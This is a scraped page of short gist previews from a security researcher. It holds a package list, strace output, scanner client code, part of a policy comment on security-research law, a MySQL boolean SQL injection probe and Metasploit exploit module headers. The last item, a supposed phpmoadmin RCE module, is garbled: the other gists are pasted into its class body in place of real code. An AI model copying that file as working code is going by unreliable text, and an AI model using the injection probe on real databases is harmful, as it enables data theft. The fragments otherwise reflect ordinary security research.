Brandon Perry brandonprry

## gist:e66b18168bdb610942a3
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                           Version                     Architecture Description
+++-==============================-===========================-============-===============================================================================
ii  acl                            2.2.52-2                    amd64        Access control list utilities
ii  acpi                           1.7-1                       amd64        displays information on ACPI devices
ii  acpi-support-base              0.142-6                     all          scripts for handling base ACPI events such as the power button
ii  acpid                          1:2.0.23-2                  amd64        Advanced Configuration and Power Interface event daemon
ii  adduser                        3.113+nmu3                  all          add and remove users and groups

## gist:4525ded8fca350e98d46
# LD_PRELOAD=preeny/x86_64-linux-gnu/desock.so strace ./main < get
execve("./main", ["./main"], [/* 23 vars */]) = 0
brk(0)                                  = 0x801000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd14ca18000
open("preeny/x86_64-linux-gnu/desock.so", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\24\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=18659, ...}) = 0
getcwd("/root", 128)                    = 6
mmap(NULL, 2240912, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fd14c5d0000

## gist:ef1f5ecf7f7d0cc8da03
# LD_PRELOAD=preeny/x86_64-linux-gnu/desock.so strace ./main < get
execve("./main", ["./main"], [/* 23 vars */]) = 0
brk(0)                                  = 0x1ce9000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f75d449e000
open("preeny/x86_64-linux-gnu/desock.so", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\24\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=18659, ...}) = 0
getcwd("/root", 128)                    = 6
mmap(NULL, 2240912, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f75d4050000

## gist:028e924b6a3fe86d18ea
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <microhttpd.h>
#define PORT 8081


int done = 0;

## arachni.cs
public static void Main (string[] args)
{
	using (ArachniSession session = new ArachniSession ("192.168.2.207", 4567, true)) {
		using (ArachniManager manager = new ArachniManager (session)) {
			var resp = manager.StartScan ("http://192.168.2.87/?searchquery=fdsa&action=search&x=11&y=15");

			while (manager.IsBusy ()) {
				Thread.Sleep (10000);
				Console.Write (".");
			}

## gist:6c88f60bddabf99a11da

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                brandonprry
                / gist:6c88f60bddabf99a11da
            
            
              Last active
              August 29, 2015 14:20
            
          
    Comment regarding Class-25: Software – security research
Brandon Perry, VolatileMinds
Legislation concerning lawful security research requires consideration not only into the current state of software security, but also the future of how we as Americans will consume and create software. Increasingly, software drives basic functions within each and every American’s daily life. Legislators and members of the security community have an excellent opportunity to create a framework that allows research by those with the capabilities and know-how to bolster the security of our homes, our businesses, and our infrastructure.
We live in a digital world now. 30 years ago, when computer software was only beginning to be accepted into the mainstream public, legislators passed the Computer Fraud and Abuse Act. This was before the Internet of Everything was a gleam in anyone’s eye, and the notion of us running out of IP addresses was laughable. Now, we have critical infrastructure, smart home appliances, and even vehicle

  
## gist:a95ad79b1d39f3ecd88d
---e-[
---

---r
---e-[
---
---!f
---!f--e-[
---

## gist:ec85fb9e890a240b1579
mysql> select 1 from users where 'fdsa' rlike (select (case when (19>20) then 'a' else '|' end));
ERROR 1139 (42000): Got error 'empty (sub)expression' from regexp
mysql> select length((select name from users limit 0,1));
+--------------------------------------------+
| length((select name from users limit 0,1)) |
+--------------------------------------------+
|                                          5 |
+--------------------------------------------+
1 row in set (0.00 sec)

## gist:f83917e0fcc3bf3ccd6b
msf exploit(rails_secret_deserialization) > show options

Module options (exploit/multi/http/rails_secret_deserialization):

   Name             Current Setting                                                                                                                                                                   Required  Description
   ----             ---------------                                                                                                                                                                   --------  -----------
   COOKIE_NAME                                                                                                                                                                                        no        The name of the session cookie
   DIGEST_NAME      SHA1                                                                                                                                                                              yes       The digest t

## phpmoadmin_rce.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
require 'rexml/document'

class Metasploit4 < Msf::Exploit::Remote
	Desired=Unknown/Install/Remove/Purge/Hold
	\| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
	\|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
	\|\|/ Name Version Architecture Description
	+++-==============================-===========================-============-===============================================================================
	ii acl 2.2.52-2 amd64 Access control list utilities
	ii acpi 1.7-1 amd64 displays information on ACPI devices
	ii acpi-support-base 0.142-6 all scripts for handling base ACPI events such as the power button
	ii acpid 1:2.0.23-2 amd64 Advanced Configuration and Power Interface event daemon
	ii adduser 3.113+nmu3 all add and remove users and groups
	# LD_PRELOAD=preeny/x86_64-linux-gnu/desock.so strace ./main < get
	execve("./main", ["./main"], [/* 23 vars */]) = 0
	brk(0) = 0x801000
	access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
	mmap(NULL, 8192, PROT_READ\|PROT_WRITE, MAP_PRIVATE\|MAP_ANONYMOUS, -1, 0) = 0x7fd14ca18000
	open("preeny/x86_64-linux-gnu/desock.so", O_RDONLY\|O_CLOEXEC) = 3
	read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\24\0\0\0\0\0\0"..., 832) = 832
	fstat(3, {st_mode=S_IFREG\|0755, st_size=18659, ...}) = 0
	getcwd("/root", 128) = 6
	mmap(NULL, 2240912, PROT_READ\|PROT_EXEC, MAP_PRIVATE\|MAP_DENYWRITE, 3, 0) = 0x7fd14c5d0000
	# LD_PRELOAD=preeny/x86_64-linux-gnu/desock.so strace ./main < get
	execve("./main", ["./main"], [/* 23 vars */]) = 0
	brk(0) = 0x1ce9000
	access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
	mmap(NULL, 8192, PROT_READ\|PROT_WRITE, MAP_PRIVATE\|MAP_ANONYMOUS, -1, 0) = 0x7f75d449e000
	open("preeny/x86_64-linux-gnu/desock.so", O_RDONLY\|O_CLOEXEC) = 3
	read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\24\0\0\0\0\0\0"..., 832) = 832
	fstat(3, {st_mode=S_IFREG\|0755, st_size=18659, ...}) = 0
	getcwd("/root", 128) = 6
	mmap(NULL, 2240912, PROT_READ\|PROT_EXEC, MAP_PRIVATE\|MAP_DENYWRITE, 3, 0) = 0x7f75d4050000
	#include <string.h>
	#include <stdio.h>
	#include <sys/types.h>
	#include <sys/select.h>
	#include <sys/socket.h>
	#include <microhttpd.h>
	#define PORT 8081


	int done = 0;
	public static void Main (string[] args)
	{
	using (ArachniSession session = new ArachniSession ("192.168.2.207", 4567, true)) {
	using (ArachniManager manager = new ArachniManager (session)) {
	var resp = manager.StartScan ("http://192.168.2.87/?searchquery=fdsa&action=search&x=11&y=15");

	while (manager.IsBusy ()) {
	Thread.Sleep (10000);
	Console.Write (".");
	}
	mysql> select 1 from users where 'fdsa' rlike (select (case when (19>20) then 'a' else '\|' end));
	ERROR 1139 (42000): Got error 'empty (sub)expression' from regexp
	mysql> select length((select name from users limit 0,1));
	+--------------------------------------------+
	\| length((select name from users limit 0,1)) \|
	+--------------------------------------------+
	\| 5 \|
	+--------------------------------------------+
	1 row in set (0.00 sec)
	msf exploit(rails_secret_deserialization) > show options

	Module options (exploit/multi/http/rails_secret_deserialization):

	Name Current Setting Required Description
	---- --------------- -------- -----------
	COOKIE_NAME no The name of the session cookie
	DIGEST_NAME SHA1 yes The digest t
	##
	# This module requires Metasploit: http//metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'
	require 'rex'
	require 'rexml/document'

	class Metasploit4 < Msf::Exploit::Remote